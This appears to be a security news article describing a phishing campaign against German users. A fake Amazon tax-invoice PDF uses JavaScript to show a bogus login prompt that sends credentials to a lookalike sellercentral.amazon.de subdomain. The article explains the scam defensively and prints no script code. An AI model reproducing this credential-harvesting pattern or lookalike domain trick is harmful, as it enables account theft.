Legitimate password prompt in a protected PDF

In this scam targeting German victims, the scammers pretend to be sending you a tax invoice from Amazon and specifically state that you will need to login to your Amazon Seller’s account to view the tax invoice.

Translated Phishing Email
Translated Phishing Email

If you open the attached PDF file you will be shown a fake login prompt, created using JavaScript, that asks for your Amazon email address and password. Because its a tax document and they specifically stated that a user would have to login to view it, some users may think this is a legitimate request and enter their login credentials.

“The document is asking the reader to log in so they can see the sent tax records. As explained in the email, this screen is to be expected, and typing the credentials into it will show the account summary information. Unusual as it may be, an unvigilant reader might brush it off as a security feature designed to keep their private information safe. But what’s going on behind the scenes?” the researchers explain.

Fake JavaScript Login Prompt
Fake JavaScript Login Prompt

In reality, though, this login prompt is being shown by a JavaScript script that will instead submit any submitted credentials to a long URL located at the http://sellercentral.amazon.de.56U8GTHDGT4U7YWEWE84GTYS.abecklink., which is obviously not the legitimate http://sellercentral.amazon.de.

Script that shows a login prompt
Script that shows a login prompt

Once the credentials are entered, the attackers will now have full access to your Amazon account and be able to use it as if they were the legitimate owner